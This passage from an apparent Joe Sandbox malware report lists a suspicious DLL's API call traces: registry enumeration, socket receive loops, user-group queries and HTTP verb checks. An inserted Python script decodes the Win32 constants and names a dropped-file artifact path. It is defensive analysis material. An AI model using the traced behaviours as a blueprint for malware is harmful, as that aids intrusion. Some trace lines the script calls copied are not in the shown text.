                                                          • Instruction ID: 8c67bea88b0b57ba7171819d29684a3193598bd87e769d5b6608642be2e21653
                                                          • Opcode Fuzzy Hash: 4aa8ea225159965a049aa2fe34a5fb1e8fa0c1b1fe3f4e01dfbb9777c5d44c70
                                                          • Instruction Fuzzy Hash: FA116375104310BFE310DF18DC94BEBBBE9FB89710F444929FA48A72A1DB745909CBA2
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(dwmapi.dll,10098B10,1001767F), ref: 10017486
                                                          • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 1001749F
                                                          • GetProcAddress.KERNEL32(00000000,DwmEnableComposition), ref: 100174AB
                                                            • Part of subcall function 10017460: #102.DWMAPI(00000000,100174B6), ref: 1001746B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 100174B7
                                                          Similarity
                                                          • API ID: AddressLibraryProc$#102FreeLoad
                                                          • String ID: DwmEnableComposition$DwmIsCompositionEnabled$dwmapi.dll
                                                          • API String ID: 921056788-1849796216
                                                          • Opcode ID: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                          • Instruction ID: ec8973c85b4295611fe6e660086daf7ad590bfada4181087f49f392a1ed51eb0
                                                          • Opcode Fuzzy Hash: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                          • Instruction Fuzzy Hash: 29E0123A502D3A679251F72D5C14DCF2AA8FF867E13464251FD08F6114DB24DD4289B6
                                                          APIs
                                                          • _CxxThrowException.MSVCRT(?,100F59A0), ref: 10004DC3
                                                          • #823.MFC42(10004C7C,?,00000004,00000000,00000004,10004C8B,00000004,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10004E37
                                                          • #823.MFC42(00000000,?,?,?,00000000,10097CF0,000000FF,75CA23A0,10004C8B,?,00000000), ref: 10004E48
                                                          • #825.MFC42(00000000,00000000,?,?,?), ref: 10004EAE
                                                          • #825.MFC42(00000000,00000000,00000000,?,?,?), ref: 10004EB4
                                                          • _CxxThrowException.MSVCRT(?), ref: 10004ED1
                                                          • #825.MFC42(?,?,?,?,?,00000000,10097CF0,000000FF,75CA23A0,10004C8B,?,00000000), ref: 10004EDE
                                                          • #825.MFC42(10097CF0,?,?,?,?,00000000,10097CF0,000000FF,75CA23A0,10004C8B,?,00000000), ref: 10004EEE
                                                            • Part of subcall function 10004FA0: _ftol.MSVCRT ref: 10004FDF
                                                            • Part of subcall function 10004FA0: #823.MFC42(00000000), ref: 10004FE9
                                                          Similarity
                                                          • API ID: #825$#823$ExceptionThrow$_ftol
                                                          • String ID:
                                                          • API String ID: 3722084872-0
                                                          • Opcode ID: c76f4588f4861e8b0e5033ec5df18216b91fc0f614261ac88326526c7a5f0dfa
                                                          • Instruction ID: a565fb7e3d51c96f679dbc9a240e4393d41c51425d2560a9ab3a27c4c36f4040
                                                          • Opcode Fuzzy Hash: c76f4588f4861e8b0e5033ec5df18216b91fc0f614261ac88326526c7a5f0dfa
                                                          • Instruction Fuzzy Hash: 9F51B4B5A002099BEF00DF64C881FEEB7B9EF48680F014029F905AB345DF34B9058B95
                                                          APIs
                                                            • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                            • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                            • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                          • GetCursorPos.USER32(?), ref: 10018E2A
                                                          • GetCursorInfo.USER32(?), ref: 10018E4B
                                                          • DestroyCursor.USER32(?), ref: 10018E74
                                                          • GetTickCount.KERNEL32 ref: 10018F68
                                                          • Sleep.KERNEL32(00000001), ref: 10018F7D
                                                          • GetTickCount.KERNEL32 ref: 10018F7F
                                                          • GetTickCount.KERNEL32 ref: 10018F8C
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10018F90
                                                          Similarity
                                                          • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                                                          • String ID:
                                                          • API String ID: 3294368536-0
                                                          • Opcode ID: 037408136d0e8afe5519c2a5e62d739685f91187dea39c72eced2e216c808e74
                                                          • Instruction ID: 4f03d926a0baacb7089b61cc6bb794afa349875f5de70ab595e6e7c43cb61433
                                                          • Opcode Fuzzy Hash: 037408136d0e8afe5519c2a5e62d739685f91187dea39c72eced2e216c808e74
                                                          • Instruction Fuzzy Hash: CB5181752007049FD724DF28C884A6AB3E6FFC8350B544A2DF586CB651D730FA86CB61
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015071
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 100150A7
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100150E6
                                                          • #823.MFC42(?,?,?,?,00000000,000F003F,?), ref: 10015123
                                                          • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 10015178
                                                          • #825.MFC42(00000000), ref: 100151BD
                                                          • RegCloseKey.ADVAPI32(?), ref: 100151CA
                                                          • LocalReAlloc.KERNEL32(?,?,00000042), ref: 100151D8
                                                          Similarity
                                                          • API ID: AllocLocal$#823#825CloseEnumInfoOpenQuery
                                                          • String ID:
                                                          • API String ID: 601778281-0
                                                          • Opcode ID: a2b48a681b185d323437fdecebe6a6adc8219f97ee03d012f06754e556716deb
                                                          • Instruction ID: 88fa596de87147defa139ed4991a26d14cbba2f64f8a82903b7c0e8481319102
                                                          • Opcode Fuzzy Hash: a2b48a681b185d323437fdecebe6a6adc8219f97ee03d012f06754e556716deb
                                                          • Instruction Fuzzy Hash: 9F517171604305AFD714DF28CC91B6BB7E9FB88610F584A2DF949DB380D635ED058BA2
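The arguments in these APIs lines are raw hex DWORDs, so the file-drop block at 1002C0AA, the registry enumeration block at 10015071 and the socket subcall at 100234D0 only become readable once they are decoded: CreateFileA is called with GENERIC_WRITE, FILE_SHARE_WRITE, OPEN_ALWAYS and FILE_ATTRIBUTE_NORMAL; RegOpenKeyExA asks for KEY_ALL_ACCESS (0xF003F); socket(2,1,6) is AF_INET/SOCK_STREAM/IPPROTO_TCP; LocalAlloc(0x40) and LocalReAlloc(…,0x42) are LPTR and LHND. The MFC42 ordinals #823 and #825 that appear throughout are operator new and operator delete. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's own format (the sample lines are copied from the trace) and decodes the arguments with the documented Win32 constants; the decoder table, the argument names and the output dictionary layout are the example's own choices.

```python
import re

# Lines copied from the report's APIs sections above (report format, not constructed).
TRACE_LINES = [
    "• socket.WS2_32(00000002,00000001,00000006), ref: 10023533",
    "• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1002C0AA",
    "• RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015071",
    "• LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100150E6",
    "• LocalReAlloc.KERNEL32(?,?,00000042), ref: 100151D8",
    "• #823.MFC42(00000001), ref: 10016F58",
]

# "• [Part of subcall function XXXX: ]Api.MODULE(args), ref: XXXX" (args and ref optional)
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

# Win32 constants (documented values).
GENERIC_ACCESS = [("GENERIC_READ", 0x80000000), ("GENERIC_WRITE", 0x40000000),
                  ("GENERIC_EXECUTE", 0x20000000), ("GENERIC_ALL", 0x10000000)]
SHARE_MODE = [("FILE_SHARE_READ", 0x1), ("FILE_SHARE_WRITE", 0x2), ("FILE_SHARE_DELETE", 0x4)]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = [("FILE_ATTRIBUTE_HIDDEN", 0x2), ("FILE_ATTRIBUTE_SYSTEM", 0x4),
             ("FILE_ATTRIBUTE_NORMAL", 0x80), ("FILE_FLAG_DELETE_ON_CLOSE", 0x04000000),
             ("FILE_FLAG_WRITE_THROUGH", 0x80000000)]
KEY_BITS = [("KEY_QUERY_VALUE", 0x1), ("KEY_SET_VALUE", 0x2), ("KEY_CREATE_SUB_KEY", 0x4),
            ("KEY_ENUMERATE_SUB_KEYS", 0x8), ("KEY_NOTIFY", 0x10), ("KEY_CREATE_LINK", 0x20),
            ("DELETE", 0x10000), ("READ_CONTROL", 0x20000), ("WRITE_DAC", 0x40000),
            ("WRITE_OWNER", 0x80000)]
KEY_COMPOSITES = [("KEY_ALL_ACCESS", 0xF003F), ("KEY_READ", 0x20019), ("KEY_WRITE", 0x20006)]
LMEM_BITS = [("LMEM_MOVEABLE", 0x2), ("LMEM_ZEROINIT", 0x40)]
LMEM_COMPOSITES = [("LHND", 0x42), ("LPTR", 0x40)]
ADDRESS_FAMILY = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTOCOL = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
MFC42_ORDINALS = {"#823": "operator new", "#825": "operator delete"}


def flags(value, bits, composites=()):
    """Render a bitmask: composite names first, then single bits, then any leftover in hex."""
    names = []
    for name, mask in composites:
        if value & mask == mask:
            names.append(name)
            value &= ~mask
    for name, mask in bits:
        if value & mask:
            names.append(name)
            value &= ~mask
    if value or not names:
        names.append(f"0x{value:X}")
    return "|".join(names)


def enum(value, table):
    return table.get(value, f"0x{value:X}")


# (api, zero-based argument index) -> (argument name, decoder)
DECODERS = {
    ("CreateFileA", 1): ("dwDesiredAccess", lambda v: flags(v, GENERIC_ACCESS)),
    ("CreateFileA", 2): ("dwShareMode", lambda v: flags(v, SHARE_MODE)),
    ("CreateFileA", 4): ("dwCreationDisposition", lambda v: enum(v, DISPOSITION)),
    ("CreateFileA", 5): ("dwFlagsAndAttributes", lambda v: flags(v, FILE_ATTR)),
    ("RegOpenKeyExA", 3): ("samDesired", lambda v: flags(v, KEY_BITS, KEY_COMPOSITES)),
    ("LocalAlloc", 0): ("uFlags", lambda v: flags(v, LMEM_BITS, LMEM_COMPOSITES)),
    ("LocalReAlloc", 2): ("uFlags", lambda v: flags(v, LMEM_BITS, LMEM_COMPOSITES)),
    ("socket", 0): ("af", lambda v: enum(v, ADDRESS_FAMILY)),
    ("socket", 1): ("type", lambda v: enum(v, SOCKET_TYPE)),
    ("socket", 2): ("protocol", lambda v: enum(v, PROTOCOL)),
}


def parse_arg(token):
    """'?' -> None, 8 hex digits (optionally negative) -> int, anything else -> literal string."""
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", token):
        return -int(token[1:], 16) if token.startswith("-") else int(token, 16)
    return token


def parse_api_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def decode_call(call):
    decoded = {}
    for i, value in enumerate(call["args"]):
        spec = DECODERS.get((call["api"], i))
        if spec and isinstance(value, int):
            name, fn = spec
            decoded[name] = fn(value)
    out = dict(call, decoded=decoded)
    if call["module"] == "MFC42" and call["api"] in MFC42_ORDINALS:
        out["alias"] = MFC42_ORDINALS[call["api"]]
    return out


def decode_trace(lines):
    return [decode_call(c) for c in map(parse_api_line, lines) if c]


if __name__ == "__main__":
    for call in decode_trace(TRACE_LINES):
        print(call["api"], call.get("alias", ""), call["decoded"], "@", call["ref"])
```

With the dispositions decoded, the block at 1002C0AA reads as: open or create C:\ProgramData\Microsoft Drive\BITS.sys for writing, write lstrlenA bytes, CloseHandle; that path and the BITS and TGByte\Setup strings from the same block are the host artifacts to look for, and the KEY_ALL_ACCESS request at 10015071 means the registry walk will fail, not degrade, on keys the process cannot write.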
                                                          APIs
                                                          • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A40F
                                                          • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A417
                                                          • memmove.MSVCRT(3B4208C4,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A439
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A44B
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A458
                                                          • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?,?,00000000,00000065), ref: 1000A460
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A497
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(3B4208C4,00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?), ref: 1000A4D8
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@memmove
                                                          • String ID:
                                                          • API String ID: 1074130261-0
                                                          • Opcode ID: 9c78330a7592489e721474567922780b083d31e010480504787a7ba47f8834b6
                                                          • Instruction ID: 8f937d4beb23756cef0cc620a4d7fe7e7cbc97e07a2ad92db45a8aecb1b163fa
                                                          • Opcode Fuzzy Hash: 9c78330a7592489e721474567922780b083d31e010480504787a7ba47f8834b6
                                                          • Instruction Fuzzy Hash: B141D1396407549FD710CF19C8C869ABBE5FBC9BA0F44862EEC5A87351C7759D40CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strnicmp
                                                          • String ID: CONNECT $GET $HEAD $POST
                                                          • API String ID: 2635805826-4031508290
                                                          • Opcode ID: 8e8e20cc63fc578047ea9d7e9a2d678a8d19106c685452c0aaff9deb6189becf
                                                          • Instruction ID: 56b8aeecee1c06f363fda1625e6891ae750e34b4eb493f0379659d4a6d732177
                                                          • Opcode Fuzzy Hash: 8e8e20cc63fc578047ea9d7e9a2d678a8d19106c685452c0aaff9deb6189becf
                                                          • Instruction Fuzzy Hash: 9F01B131300651ABE700EA6CFC00BCE73D8EFC5316F860476F940DB280E3B888058B91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: sprintf$floor
                                                          • String ID: %.0f
                                                          • API String ID: 389794084-4293663076
                                                          • Opcode ID: cb3f7aaaf6b266179aa8dd0ee4d912ea5967b7a82becc2bba026ec5a4ef99637
                                                          • Instruction ID: a274ceac6ce3522e1593489d29bd3f77ae1b15863641420014f16e45a4b04ce6
                                                          • Opcode Fuzzy Hash: cb3f7aaaf6b266179aa8dd0ee4d912ea5967b7a82becc2bba026ec5a4ef99637
                                                          • Instruction Fuzzy Hash: F0417CB1A04615A7F3028B54ED9879777ACFFC23D6F044261FE8892294DB21D974C7E2
                                                          APIs
                                                          • mbstowcs.MSVCRT ref: 1002533C
                                                          • NetUserGetLocalGroups.NETAPI32(00000000,?,00000000,00000001,?,000000FF,?,?,000000FF,771B0440,1012C810), ref: 10025362
                                                          • wcslen.MSVCRT ref: 100253A2
                                                          • malloc.MSVCRT ref: 100253AA
                                                          • wsprintfA.USER32 ref: 100253BC
                                                          • strncpy.MSVCRT ref: 100253CD
                                                          • free.MSVCRT ref: 100253D4
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GroupsLocalUserfreemallocmbstowcsstrncpywcslenwsprintf
                                                          • String ID:
                                                          • API String ID: 4292357205-0
                                                          • Opcode ID: 023305b100a19051cf8433f0c5e1e5ebd5d1c0fcd5ea7517d1341ce18eb5f5f0
                                                          • Instruction ID: a7a275717bc2eaa59cca954d1c38aa140f42989ba72a02d1dc1ea02adfe13beb
                                                          • Opcode Fuzzy Hash: 023305b100a19051cf8433f0c5e1e5ebd5d1c0fcd5ea7517d1341ce18eb5f5f0
                                                          • Instruction Fuzzy Hash: 513145701083626FD315DF24DC809EBBBE8FB88315F400A2CF99AC3281DB71DA458B96
                                                          APIs
                                                          • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 1002CAA5
                                                          • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAB9
                                                          • recv.WS2_32(?,?,00002000,00000000), ref: 1002CAD2
                                                          • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAFA
                                                          • recv.WS2_32(?,?,00002000,00000000), ref: 1002CB13
                                                          • closesocket.WS2_32 ref: 1002CB49
                                                          • closesocket.WS2_32(?), ref: 1002CB4C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: closesocketrecv$select
                                                          • String ID:
                                                          • API String ID: 2008065562-0
                                                          • Opcode ID: e271df9bc814dd9e55aae6123291c06ec4163cbd0491a0e87936393d54a90af3
                                                          • Instruction ID: ec9980a7f672bdef49e95ff414efc98edb547c3db94ee23b0d429c32d668f30b
                                                          • Opcode Fuzzy Hash: e271df9bc814dd9e55aae6123291c06ec4163cbd0491a0e87936393d54a90af3
                                                          • Instruction Fuzzy Hash: 4A31E63560834D6BE335CEA4DC86FEBB7DCEB40780F810829EA45D6182D774E90487A3
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
                                                          • #823.MFC42(000001F0), ref: 100166B0
                                                          • #823.MFC42(000001F0), ref: 100166E1
                                                            • Part of subcall function 10017D20: LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
                                                          • #823.MFC42(000001F0), ref: 10016708
                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$ExchangeInterlocked$CloseCursorHandleLoadObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3589420723-0
                                                          • Opcode ID: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
                                                          • Instruction ID: 712e268baaa8dd016a258d9f4d26cd7f4b70a444460d0a0c6ff612943e0d7f80
                                                          • Opcode Fuzzy Hash: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
                                                          • Instruction Fuzzy Hash: C331B274644704ABE720CB348C92FAA77E5FB4C714F000A2DF69A9A2C1DB75F580C752
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation), ref: 1002A022
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002A029
                                                          • _ftol.MSVCRT ref: 1002A12D
                                                          • Sleep.KERNEL32(000003E8), ref: 1002A15E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcSleep_ftol
                                                          • String ID: NtQuerySystemInformation$ntdll
                                                          • API String ID: 720640769-3593917365
                                                          • Opcode ID: 81c20d366371711dfdb1a7521036f42f737606428b3e54b4f78aab55d15eddcf
                                                          • Instruction ID: 41f00a39049c1ab635cf875337fd2ec3a659e732abbf042300a1853cf40f708c
                                                          • Opcode Fuzzy Hash: 81c20d366371711dfdb1a7521036f42f737606428b3e54b4f78aab55d15eddcf
                                                          • Instruction Fuzzy Hash: 364173B5A083059FE310DF65DC85A8BB7E8FBC8750F418E2DF589A2250EF3199548B92
                                                          APIs
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000947B
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF), ref: 10009494
                                                          • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094B7
                                                          • lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094C0
                                                          • LocalAlloc.KERNEL32(00000040,-0000000A,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094CE
                                                          • lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094FC
                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009524
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
